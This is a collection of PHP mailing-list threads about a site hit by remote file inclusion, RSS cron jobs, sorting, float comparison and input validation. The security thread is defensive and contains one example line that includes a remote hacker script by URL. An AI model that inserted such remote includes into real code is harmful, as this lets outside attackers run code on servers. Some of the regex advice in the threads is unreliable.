This was my fear. Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind wrote: > On 7 June 2010 14:54, Igor Escobar wrote: > > Hi Folks! > > > > The portal for which I work is suffering constant attacks that I feel > that > > is PHP Injection. Somehow the hacker is getting to change the cache files > > that our system generates. Concatenating the HTML file with another that > > have an iframe to a malicious JAR file. Do you have any suggestions to > > prevent this action? The hacker has no access to our file system, he is > > imputing the code through some security hole. The problem is that the > portal > > is very big and has lots and lots partners hosted on our estructure > > structure. We are failing to identify the focus of this attacks. > > > > Any ideas? > > > > Check all user input + upload: make sure that whatever comes from the > user is validated. Then check all output: make sure that everythin > output is escaped properly. Yes, it's an enormous task, but there's no > way around it. > > Regards > Peter > > -- > > WWW: http://plphp.dk / http://plind.dk > LinkedIn: http://www.linkedin.com/in/plind > BeWelcome/Couchsurfing: Fake51 > Twitter: http://twitter.com/kafe15 > >
Re: [PHP] Security Issue
I do not believe he is doing so through forms but PHP Injection. We have already met one of the files that he used to make the concatenation of the cache files. Need to know if there is a tool, anything, that we can install on the server and identify the hacker more easily because the manual labor is not giving much result. Thanks for all support! Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:08 AM, Phpster wrote: > > On Jun 7, 2010, at 8:54 AM, Igor Escobar wrote: > > Hi Folks! >> >> The portal for which I work is suffering constant attacks that I feel that >> is PHP Injection. Somehow the hacker is getting to change the cache files >> that our system generates. Concatenating the HTML file with another that >> have an iframe to a malicious JAR file. Do you have any suggestions to >> prevent this action? The hacker has no access to our file system, he is >> imputing the code through some security hole. The problem is that the >> portal >> is very big and has lots and lots partners hosted on our estructure >> structure. We are failing to identify the focus of this attacks. >> >> Any ideas? >> >> >> Regards, >> Igor Escobar >> Systems Analyst & Interface Designer >> >> + http://blog.igorescobar.com >> + http://www.igorescobar.com >> + @igorescobar (twitter) >> > > Can you implement a simple form dump process that would catch the form name > an the data being entered and save that? That would allow you to at least > see what script has the hole as you trap it. > > Bastien > > Sent from my iPod > >
Re: [PHP] Security Issue
It's not a SQL Injection or XSS problem, Michael. It's a PHP Injection problem. I know how fix that but the web site is very very huge, have lots and lots of partners and i'm have a bug difficult do identify the focus of the problem. Got it? Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle wrote: > It's not that bad. > > Use filter functions and sanity checks for input. > > Use htmlspecialchars() basically on output. > > That should take care of basically everything. > > > On Jun 7, 2010, at 6:16 AM, Igor Escobar wrote: > > This was my fear. >> >> Regards, >> Igor Escobar >> Systems Analyst & Interface Designer >> >> + http://blog.igorescobar.com >> + http://www.igorescobar.com >> + @igorescobar (twitter) >> >> >> >> >> >> On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind >> wrote: >> >> On 7 June 2010 14:54, Igor Escobar wrote: >>> >>>> Hi Folks! >>>> >>>> The portal for which I work is suffering constant attacks that I feel >>>> >>> that >>> >>>> is PHP Injection. Somehow the hacker is getting to change the cache >>>> files >>>> that our system generates. Concatenating the HTML file with another that >>>> have an iframe to a malicious JAR file. Do you have any suggestions to >>>> prevent this action? The hacker has no access to our file system, he is >>>> imputing the code through some security hole. The problem is that the >>>> >>> portal >>> >>>> is very big and has lots and lots partners hosted on our estructure >>>> structure. We are failing to identify the focus of this attacks. >>>> >>>> Any ideas? >>>> >>>> >>> Check all user input + upload: make sure that whatever comes from the >>> user is validated. Then check all output: make sure that everythin >>> output is escaped properly. Yes, it's an enormous task, but there's no >>> way around it. >>> >>> Regards >>> Peter >>> >>> -- >>> >>> WWW: http://plphp.dk / http://plind.dk >>> LinkedIn: http://www.linkedin.com/in/plind >>> BeWelcome/Couchsurfing: Fake51 >>> Twitter: http://twitter.com/kafe15 >>> >>> >>> > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] Security Issue
I think we're getting off topic here folks... Regards, Igor Escobar Systems Analyst & Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan wrote: > On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote: > > Oh yeah. I do more than just intval() I make sure they didn't feed me > anything BUT numeric text first. I do sanity check before type > forcing :) > > I use garbage in garbage out. So I take what is given to me and yes I > escape if before the db of course as well, and then encode on output. > > On Jun 7, 2010, at 10:45 AM, Ashley Sheridan > wrote: > > > On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote: > >> > >> It's not that bad. > >> > >> Use filter functions and sanity checks for input. > >> > >> Use htmlspecialchars() basically on output. > >> > >> That should take care of basically everything. > >> > >> On Jun 7, 2010, at 6:16 AM, Igor Escobar > >> wrote: > >> > >> > This was my fear. > >> > > >> > Regards, > >> > Igor Escobar > >> > Systems Analyst & Interface Designer > >> > > >> > + http://blog.igorescobar.com > >> > + http://www.igorescobar.com > >> > + @igorescobar (twitter) > >> > > >> > > >> > > >> > > >> > > >> > On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind > >> > >> > wrote: > >> > > >> >> On 7 June 2010 14:54, Igor Escobar wrote: > >> >>> Hi Folks! > >> >>> > >> >>> The portal for which I work is suffering constant attacks that I > >> >>> feel > >> >> that > >> >>> is PHP Injection. Somehow the hacker is getting to change the > >> >>> cache files > >> >>> that our system generates. Concatenating the HTML file with > >> >>> another that > >> >>> have an iframe to a malicious JAR file. Do you have any > >> >>> suggestions to > >> >>> prevent this action? The hacker has no access to our file system, > >> >>> he is > >> >>> imputing the code through some security hole. The problem is that > >> >>> the > >> >> portal > >> >>> is very big and has lots and lots partners hosted on our > >> estructure > >> >>> structure. We are failing to identify the focus of this attacks. > >> >>> > >> >>> Any ideas? > >> >>> > >> >> > >> >> Check all user input + upload: make sure that whatever comes > >> from the > >> >> user is validated. Then check all output: make sure that everythin > >> >> output is escaped properly. Yes, it's an enormous task, but > >> there's > >> >> no > >> >> way around it. > >> >> > >> >> Regards > >> >> Peter > >> >> > >> >> -- > >> >> > >> >> WWW: http://plphp.dk / http://plind.dk > >> >> LinkedIn: http://www.linkedin.com/in/plind > >> >> BeWelcome/Couchsurfing: Fake51 > >> >> Twitter: http://twitter.com/kafe15 > >> >> > >> >> > >> > > > > htmlspecialchars() is really only good for user input that you are > > outputting to the browser. For inserting data into a database, use > > mysql_real_escape_string(). I find it's good to think carefully > > about what sort of data I expect and sanitise it accordingly. If I > > want a numerical value, I use intval($_GET['var']) or floatval(). > > For things like small text box elements, regex's work well depending > > on the data. For data from select lists of checkboxes, make sure the > > value given is within a list of pre-determined values you have. > > Basically, nothing from the user should be trusted at all, ever. > > > > As soon as you let go of that trust in the good honesty of people > > you'll do fine ;) > > > > Thanks, > > Ash > > http://www.ashleysheridan.co.uk > > > > > > > Why waste time validating an integer value when intval() will do that for > you? > > > Thanks, > Ash > http://www.ashleysheridan.co.uk > > >
Re: [PHP] Security Issue
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.
// my code...
// my code...
include ('http:///externalhackscript.txt');
//my code...
//my code..
I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.
Got it?
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan
wrote:
> On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
>
> > It's not a SQL Injection or XSS problem, Michael.
> >
> > It's a PHP Injection problem. I know how fix that but the web site is
> very
> > very huge, have lots and lots of partners and i'm have a bug difficult do
> > identify the focus of the problem.
> >
> > Got it?
> >
> >
> > Regards,
> > Igor Escobar
> > Systems Analyst & Interface Designer
> >
> > + http://blog.igorescobar.com
> > + http://www.igorescobar.com
> > + @igorescobar (twitter)
> >
> >
> >
> >
> >
> > On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle
> wrote:
> >
> > > It's not that bad.
> > >
> > > Use filter functions and sanity checks for input.
> > >
> > > Use htmlspecialchars() basically on output.
> > >
> > > That should take care of basically everything.
> > >
> > >
> > > On Jun 7, 2010, at 6:16 AM, Igor Escobar
> wrote:
> > >
> > > This was my fear.
> > >>
> > >> Regards,
> > >> Igor Escobar
> > >> Systems Analyst & Interface Designer
> > >>
> > >> + http://blog.igorescobar.com
> > >> + http://www.igorescobar.com
> > >> + @igorescobar (twitter)
> > >>
> > >>
> > >>
> > >>
> > >>
> > >> On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind
> > >> wrote:
> > >>
> > >> On 7 June 2010 14:54, Igor Escobar wrote:
> > >>>
> > >>>> Hi Folks!
> > >>>>
> > >>>> The portal for which I work is suffering constant attacks that I
> feel
> > >>>>
> > >>> that
> > >>>
> > >>>> is PHP Injection. Somehow the hacker is getting to change the cache
> > >>>> files
> > >>>> that our system generates. Concatenating the HTML file with another
> that
> > >>>> have an iframe to a malicious JAR file. Do you have any suggestions
> to
> > >>>> prevent this action? The hacker has no access to our file system, he
> is
> > >>>> imputing the code through some security hole. The problem is that
> the
> > >>>>
> > >>> portal
> > >>>
> > >>>> is very big and has lots and lots partners hosted on our estructure
> > >>>> structure. We are failing to identify the focus of this attacks.
> > >>>>
> > >>>> Any ideas?
> > >>>>
> > >>>>
> > >>> Check all user input + upload: make sure that whatever comes from the
> > >>> user is validated. Then check all output: make sure that everythin
> > >>> output is escaped properly. Yes, it's an enormous task, but there's
> no
> > >>> way around it.
> > >>>
> > >>> Regards
> > >>> Peter
> > >>>
> > >>> --
> > >>>
> > >>> WWW: http://plphp.dk / http://plind.dk
> > >>> LinkedIn: http://www.linkedin.com/in/plind
> > >>> BeWelcome/Couchsurfing: Fake51
> > >>> Twitter: http://twitter.com/kafe15
> > >>>
> > >>>
> > >>>
> > > --
> > > PHP General Mailing List (http://www.php.net/)
> > > To unsubscribe, visit: http://www.php.net/unsub.php
> > >
> > >
>
>
> What do you mean it's a PHP injection? PHP is all on the server, and the
> only way to get at that if you don't have direct access to the server
> (which you've said isn't possible as the passwords, etc are all fine)
> then the bad data is coming from either a form or another area where
> user data is expected. This data might be as simple as unsanitised URL
> variables that are intended to fetch a blog entry, to form data sent in
> a registration page.
>
> All data coming from the user is bad until proven otherwise.
>
> Thanks,
> Ash
> http://www.ashleysheridan.co.uk
>
>
>
Re: [PHP] Security Issue
I'm totally agree with you Ash,
I came up here to ask you guys some for light. Anything to well me to track
that M%$#% F#$CK#$# and discover from where he's attacking.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 3:06 PM, Ashley Sheridan
wrote:
> On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
>
> PHP Injection is the technical name given to a security hole in PHP
> applications. When this gap there is a hacker can do with an external code
> that is interpreted as an inner code as if the code included was more a part
> of the script.
>
>
>
> // my code...
>
> // my code...
>
> include ('http:///externalhackscript.txt');
>
> //my code...
>
> //my code..
>
>
>
> I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.
>
>
>
> Got it?
>
>
>
>
>
> Regards,
> Igor Escobar
> Systems Analyst & Interface Designer
>
> + http://blog.igorescobar.com
> + http://www.igorescobar.com
> + @igorescobar (twitter)
>
>
>
>
>
> On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan
> wrote:
>
>
> On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
>
> > It's not a SQL Injection or XSS problem, Michael.
> >
> > It's a PHP Injection problem. I know how fix that but the web site is
> very
> > very huge, have lots and lots of partners and i'm have a bug difficult do
> > identify the focus of the problem.
> >
> > Got it?
> >
> >
> > Regards,
> > Igor Escobar
> > Systems Analyst & Interface Designer
> >
> > + http://blog.igorescobar.com
> > + http://www.igorescobar.com
> > + @igorescobar (twitter)
> >
> >
> >
> >
> >
> > On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle
> wrote:
> >
> > > It's not that bad.
> > >
> > > Use filter functions and sanity checks for input.
> > >
> > > Use htmlspecialchars() basically on output.
> > >
> > > That should take care of basically everything.
> > >
> > >
> > > On Jun 7, 2010, at 6:16 AM, Igor Escobar
> wrote:
> > >
> > > This was my fear.
> > >>
> > >> Regards,
> > >> Igor Escobar
> > >> Systems Analyst & Interface Designer
> > >>
> > >> + http://blog.igorescobar.com
> > >> + http://www.igorescobar.com
> > >> + @igorescobar (twitter)
> > >>
> > >>
> > >>
> > >>
> > >>
> > >> On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind
> > >> wrote:
> > >>
> > >> On 7 June 2010 14:54, Igor Escobar wrote:
> > >>>
> > >>>> Hi Folks!
> > >>>>
> > >>>> The portal for which I work is suffering constant attacks that I
> feel
> > >>>>
> > >>> that
> > >>>
> > >>>> is PHP Injection. Somehow the hacker is getting to change the cache
> > >>>> files
> > >>>> that our system generates. Concatenating the HTML file with another
> that
> > >>>> have an iframe to a malicious JAR file. Do you have any suggestions
> to
> > >>>> prevent this action? The hacker has no access to our file system, he
> is
> > >>>> imputing the code through some security hole. The problem is that
> the
> > >>>>
> > >>> portal
> > >>>
> > >>>> is very big and has lots and lots partners hosted on our estructure
> > >>>> structure. We are failing to identify the focus of this attacks.
> > >>>>
> > >>>> Any ideas?
> > >>>>
> > >>>>
> > >>> Check all user input + upload: make sure that whatever comes from the
> > >>> user is validated. Then check all output: make sure that everythin
> > >>> output is escaped properly. Yes, it's an enormous task, but there's
> no
> > >>> way around it.
> > >>>
> > >>> Regards
> > >>> Peter
> > >>>
> > >>> --
> > >>>
> > >>> WWW: http://plphp.dk / http://plind.dk
> > >>> LinkedIn: http://www.linkedin.com/in/plind
> > >>> BeWelcome/Couchsurfing: Fake51
> > >>> Twitter: http://twitte
Re: [PHP] Security Issue
Hey Richard,
I'll find more about this parameter allow_url_include, thank you!
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 5:26 PM, richard gray wrote:
> On 07/06/2010 20:00, Igor Escobar wrote:
>
>> PHP Injection is the technical name given to a security hole in PHP
>> applications. When this gap there is a hacker can do with an external code
>> that is interpreted as an inner code as if the code included was more a
>> part
>> of the script.
>>
>> // my code...
>> // my code...
>> include ('http:///externalhackscript.txt');
>> //my code...
>> //my code..
>>
> can you not switch off remote file includes in php.ini?
> This will stop include/require from a remote host..
> i.e. /allow_url_include = Off in php.ini
>
> HTH
> Rich
> /
>
Re: [PHP] PHP cron job optimization
Use PHP threads. Do the job separately.. in parts... in other words... you can't read all them at once. You can read a little more about php multithreading here: http://blog.motane.lu/2009/01/02/multithreading-in-php/ You can use a non-relational database like mongo or couchdb to manage where you stop and where you have to look back to the RSS feed as well. []'s Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Sat, Sep 10, 2011 at 10:37 PM, Stuart Dallas wrote: > On 10 Sep 2011, at 09:35, muad shibani wrote: > > > I want to design an application that reads news from RSS sources. > > I have about 1000 RSS feed to collect from. > > > > I also will use Cron jobs every 15 minutes to collect the data. > > the question is: Is there a clever way to collect all those feed items > > without exhausting the server > > any Ideas > > I designed a job queuing system a while back when I had a similar problem. > You can read about it here: http://stut.net/2009/05/29/php-job-queue/. Set > that type of system up and add a job for each feed, set to run every 15 > minutes. You can then watch the server and tune the number of concurrent job > processors so you get the optimum balance between load and speed. > > -Stuart > > -- > Stuart Dallas > 3ft9 Ltd > http://3ft9.com/ > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
Re: [PHP] PHP cron job optimization
Other good point is: always set a timeout connection when you're getting the RSS data to avoid your thread get stuck unnecessary. Use cURL (is much more faster then file_get_contents). Multithreading in PHP with cURL http://devzone.zend.com/article/3341 Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Mon, Sep 12, 2011 at 10:05 AM, Igor Escobar wrote: > Use PHP threads. Do the job separately.. in parts... in other words... you > can't read all them at once. > > You can read a little more about php multithreading here: > http://blog.motane.lu/2009/01/02/multithreading-in-php/ > > You can use a non-relational database like mongo or couchdb to manage where > you stop and where you have to look back to the RSS feed as well. > > []'s > > Regards, > Igor Escobar > *Software Engineer > * > + http://blog.igorescobar.com > + http://www.igorescobar.com > + @igorescobar <http://www.twitter.com/igorescobar> > > > > > > > On Sat, Sep 10, 2011 at 10:37 PM, Stuart Dallas wrote: > >> On 10 Sep 2011, at 09:35, muad shibani wrote: >> >> > I want to design an application that reads news from RSS sources. >> > I have about 1000 RSS feed to collect from. >> > >> > I also will use Cron jobs every 15 minutes to collect the data. >> > the question is: Is there a clever way to collect all those feed items >> > without exhausting the server >> > any Ideas >> >> I designed a job queuing system a while back when I had a similar problem. >> You can read about it here: http://stut.net/2009/05/29/php-job-queue/. >> Set that type of system up and add a job for each feed, set to run every 15 >> minutes. You can then watch the server and tune the number of concurrent job >> processors so you get the optimum balance between load and speed. >> >> -Stuart >> >> -- >> Stuart Dallas >> 3ft9 Ltd >> http://3ft9.com/ >> -- >> PHP General Mailing List (http://www.php.net/) >> To unsubscribe, visit: http://www.php.net/unsub.php >> >> >
Re: [PHP] PHP cron job optimization
@Eric ok ;) Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Mon, Sep 12, 2011 at 10:52 AM, Eric Butera wrote: > On Mon, Sep 12, 2011 at 9:37 AM, Igor Escobar > wrote: > > Other good point is: always set a timeout connection when you're getting > the > > RSS data to avoid your thread get stuck unnecessary. Use cURL (is much > more > > faster then file_get_contents). > > > > Multithreading in PHP with cURL http://devzone.zend.com/article/3341 > > > > > > Regards, > > Igor Escobar > > *Software Engineer > > * > > + http://blog.igorescobar.com > > + http://www.igorescobar.com > > + @igorescobar <http://www.twitter.com/igorescobar> > > > > > > > > > > > > On Mon, Sep 12, 2011 at 10:05 AM, Igor Escobar >wrote: > > > >> Use PHP threads. Do the job separately.. in parts... in other words... > you > >> can't read all them at once. > >> > >> You can read a little more about php multithreading here: > >> http://blog.motane.lu/2009/01/02/multithreading-in-php/ > >> > >> You can use a non-relational database like mongo or couchdb to manage > where > >> you stop and where you have to look back to the RSS feed as well. > >> > >> []'s > >> > >> Regards, > >> Igor Escobar > >> *Software Engineer > >> * > >> + http://blog.igorescobar.com > >> + http://www.igorescobar.com > >> + @igorescobar <http://www.twitter.com/igorescobar> > >> > >> > >> > >> > >> > >> > >> On Sat, Sep 10, 2011 at 10:37 PM, Stuart Dallas > wrote: > >> > >>> On 10 Sep 2011, at 09:35, muad shibani wrote: > >>> > >>> > I want to design an application that reads news from RSS sources. > >>> > I have about 1000 RSS feed to collect from. > >>> > > >>> > I also will use Cron jobs every 15 minutes to collect the data. > >>> > the question is: Is there a clever way to collect all those feed > items > >>> > without exhausting the server > >>> > any Ideas > >>> > >>> I designed a job queuing system a while back when I had a similar > problem. > >>> You can read about it here: http://stut.net/2009/05/29/php-job-queue/. > >>> Set that type of system up and add a job for each feed, set to run > every 15 > >>> minutes. You can then watch the server and tune the number of > concurrent job > >>> processors so you get the optimum balance between load and speed. > >>> > >>> -Stuart > >>> > >>> -- > >>> Stuart Dallas > >>> 3ft9 Ltd > >>> http://3ft9.com/ > >>> -- > >>> PHP General Mailing List (http://www.php.net/) > >>> To unsubscribe, visit: http://www.php.net/unsub.php > >>> > >>> > >> > > > > Thread != Multi Process. >
Re: [PHP] What would you like to see in most in a text editor?
+ extensible plug-ins. Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Tue, Sep 13, 2011 at 6:13 PM, Alex Nikitin wrote: > +1 on terminal. > > For gui-based ones, i like to be able to syntax check my code and run it > from within the editor window, tabs for dozens of files i usually have open > at once, highlight that supports many languages as i can be working on many > at once (php, css, js, ruby, python, C, lua, sql, for the ones i have open > in geany atm), shortcuts are essential for things like find or replace in a > selected area or what have you, regex support in search, and something that > can be themed with white on black. > > For web-based ones, i never want to have to physically press anything to > save my work, and i expect it to be within a few words if i just closed the > browser and came back. It can't use any more resources than a usual > web-page > and has to be responsive. > > For other features to think about, built in version control system, ability > to sync with github or really any cvs/svn/git repo, diff tool integrated > into the editor, collaboration. > > Essential 1: utmost security, if they pwn your servers, they should not be > able to have my data, this means that some part of what i pass to you in my > credentials needs to not even reside on your servers (for example you can > use the salted hash to check my the password, but the clear text version is > still needed to decrypt that user's data store) and for the ultra paranoid, > i should be able to further protect my data store with another password the > hash for which you don't store, but rather store the md5 of the hash. > Essential 2: reliability, i would like to be in an N+N+1 where the service > and my data are both highly available without performance degradation when > one of the services/servers goes kablewey (technical term) > > Enjoy. > > > -- > The trouble with programmers is that you can never tell what a programmer > is > doing until it’s too late. ~Seymour Cray > > > > On Tue, Sep 13, 2011 at 4:35 PM, Robert Cummings >wrote: > > > On 11-09-13 03:56 PM, Brad Huskins wrote: > > > >> Hello all you php coders out there, > >> > >> I'm doing an Open Source text editor (just a hobby) that's designed for > >> PHP developers and is accessible through the web. This has been stewing > >> for a while, and has gotten to the point where I can use it for my own > >> work. I would like any feedback on things that people really > >> like/dislike about their current editors, as I believe some of these > >> things could be resolved in mine. > >> > >> I currently have username/password protection (with Salted-Hash > >> passwords), a file-system browser, file loading/saving, and syntax > >> highlighting -- and these things seem to work reasonably well. As well, > >> most things about the editor are scriptable with JavaScript. This would > >> seem to imply that in a few weeks I would have something useful. So I > >> would like to get some feedback on what features people would most want, > >> since I am still at a very flexible stage in development. > >> > >> If you would like to see what I have, you can go to > >> un1tware.wordpress.com. You can also peruse the code at > >> github.com/bhus/scriptr. In particular, the README on github gives a > >> little bit better rationality for why something like this might be > >> useful, and how things are currently structured. > >> > > > > I'm a big fan of editors that work in the terminal. > > > > Cheers, > > Rob. > > -- > > E-Mail Disclaimer: Information contained in this message and any > > attached documents is considered confidential and legally protected. > > This message is intended solely for the addressee(s). Disclosure, > > copying, and distribution are prohibited unless authorized. > > > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > >
[PHP] Sort problem
Hi Folks! Anyone know a smart way to order file names? An example to you guys picture what im saying is: The result of this snippet is: Array ( [0] => Two And Half Man Season 1[1] => Two And Half Man Season 10[2] => Two And Half Man Season 2 [3] => Two And Half Man Season 3 [4] => Two And Half Man Season 4 [5] => Two And Half Man Season 9 ) Anyone knows how to solve this problem? Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar>
Re: [PHP] Sort problem
Wow! Thank you! I completely forgot this method! Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Wed, Sep 14, 2011 at 12:02 PM, Marc Guay wrote: > > Anyone know a smart way to order file names? > > Nope, but I know a "natural" way: > http://ca.php.net/manual/en/function.natsort.php >
[PHP] Bug?
Anyone can explain this? https://gist.github.com/1220404 Part of the code are in portuguese so... iguais = equal diferentes = different Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar>
Re: [PHP] Bug?
I'm confused about the output of the code... very disturbed. But @*augustohp<https://gist.github.com/augustohp> * already respond the question on the gist thread (in portuguese) and explained why those results. Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Thu, Sep 15, 2011 at 6:17 PM, Daniel Brown wrote: > On Thu, Sep 15, 2011 at 17:07, Igor Escobar wrote: > > Anyone can explain this? > > > > https://gist.github.com/1220404 > > > > Part of the code are in portuguese so... > > iguais = equal > > diferentes = different > > About this part are you confused? > > -- > > Network Infrastructure Manager > http://www.php.net/ >
[PHP] Re: Bug?
Thank you guys. Regards, Igor Escobar *Software Engineer * + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar <http://www.twitter.com/igorescobar> On Thu, Sep 15, 2011 at 6:32 PM, Shawn McKenzie wrote: > On 09/15/2011 04:07 PM, Igor Escobar wrote: > > Anyone can explain this? > > > > https://gist.github.com/1220404 > > > > Part of the code are in portuguese so... > > iguais = equal > > diferentes = different > > > > Regards, > > Igor Escobar > > *Software Engineer > > * > > + http://blog.igorescobar.com > > + http://www.igorescobar.com > > + @igorescobar <http://www.twitter.com/igorescobar> > > > > 1. Obviously because of the issues with floating point precision these > are stored as the same float, a la your next example. > > 2. Using bc math for binary calculations on string representations of a > number overcomes the problems in 1. > > 3. This one is peculiar, but it seems that since they are numeric > strings that they are being juggled to float for the comparison since > using == there is no type checking. Using === yields a different > result, presumably because forcing a type check compares them as > strings. Use strcmp() to overcome this. > > 4. Do I need to explain this one? > > -- > Thanks! > -Shawn > http://www.spidean.com >
Re: [PHP] Escaping MySQL passwords necessary when md5 is used?
If you're converting the input data in a md5 hash has no reason to scape it.
Regards,
Igor Escobar
*Software Engineer
*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>
On Wed, Sep 21, 2011 at 2:53 PM, Dotan Cohen wrote:
> I have an application in which the password is stored in the database
> as md5(md5('passWord').'userSpecificSalt'). I'm checking the password
> entered with:
> $password=md5( md5('$_POST['password']').'userSpecificSalt' );
> $query="SELECT id FROM table WHERE password='{$password}'";
>
> Now I'm a bit queasy about not using mysql_real_escape_string() on
> that $password variable! Please reassure me or tell me the folly of my
> ways. Thanks!
>
> --
> Dotan Cohen
>
> http://gibberish.co.il
> http://what-is-what.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] How can I check for characters in a $_POST[] variable?
Use this regex:
if(preg_match('/[[:punct:]]/', $_POST['username']) !== 0) {
// string contains other characters, write the code
}
The POSIX class [:punct:] means matches any punctuation and symbols in your
string and that includes [!"#$%&'()*+,\-./:;<=>?@[\\\]^_`{|}~]
Regards,
Igor Escobar
*Software Engineer
*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>
On Thu, Sep 22, 2011 at 9:17 AM, Nilesh Govindarajan
wrote:
> On Thu 22 Sep 2011 08:25:29 PM IST, Eric wrote:
> > I have this problem when using php because my computer recognizes
> > the characters "." and ".." as an existing file when I use file_exists.
> Also
> > I want to check $_POST["username"] for characters other then A-Z a-z and
> 0-9.
> > If it contains anything other then, I would like to prompt the user but
> > I can't seam to use foreach properly and I don't know how to itterate
> > through the post variable with a for loop while loop or do while loop.
>
> file_exists() for . and .. would always return true, because they
> really exist! . is an alias for the current directory and .. for the
> parent directory. This is irrespective of OS.
>
> To search $_POST["username"] for characters other than A-Z, a-z, 0-9,
> you can use preg_match something like this (there's an alpha class as
> well, but I'm not sure about it):
>
> if(preg_match('(.*)^[A-Za-z0-9]+', $_POST['username']) !== 0) {
> // string contains other characters, write the code
> }
>
> --
> Nilesh Govindarajan
> http://nileshgr.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
Re: [PHP] How can I check for characters in a $_POST[] variable?
Or... just use:
if(preg_match('/^[A-Za-z0-9]+$/', $_POST['username']) !== 0) {
// string contains other characters, write the code
}
You can see this regex in action here: http://regexpal.com/?flags=®ex=
^%5BA-Za-z0-9%5D%2B%24&input=myusername01
If you put anything different of A-Za-z0-9 the regex will not match.
Regards,
Igor Escobar
*Software Engineer
*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>
On Thu, Sep 22, 2011 at 10:03 AM, Igor Escobar wrote:
> Use this regex:
> if(preg_match('/[[:punct:]]/', $_POST['username']) !== 0) {
>
> // string contains other characters, write the code
> }
>
> The POSIX class [:punct:] means matches any punctuation and symbols in
> your string and that includes [!"#$%&'()*+,\-./:;<=>?@[\\\]^_`{|}~]
>
>
> Regards,
> Igor Escobar
> *Software Engineer
> *
> + http://blog.igorescobar.com
> + http://www.igorescobar.com
> + @igorescobar <http://www.twitter.com/igorescobar>
>
>
>
>
>
>
> On Thu, Sep 22, 2011 at 9:17 AM, Nilesh Govindarajan > wrote:
>
>> On Thu 22 Sep 2011 08:25:29 PM IST, Eric wrote:
>> > I have this problem when using php because my computer recognizes
>> > the characters "." and ".." as an existing file when I use file_exists.
>> Also
>> > I want to check $_POST["username"] for characters other then A-Z a-z and
>> 0-9.
>> > If it contains anything other then, I would like to prompt the user but
>> > I can't seam to use foreach properly and I don't know how to itterate
>> > through the post variable with a for loop while loop or do while loop.
>>
>> file_exists() for . and .. would always return true, because they
>> really exist! . is an alias for the current directory and .. for the
>> parent directory. This is irrespective of OS.
>>
>> To search $_POST["username"] for characters other than A-Z, a-z, 0-9,
>> you can use preg_match something like this (there's an alpha class as
>> well, but I'm not sure about it):
>>
>> if(preg_match('(.*)^[A-Za-z0-9]+', $_POST['username']) !== 0) {
>> // string contains other characters, write the code
>> }
>>
>> --
>> Nilesh Govindarajan
>> http://nileshgr.com
>>
>> --
>> PHP General Mailing List (http://www.php.net/)
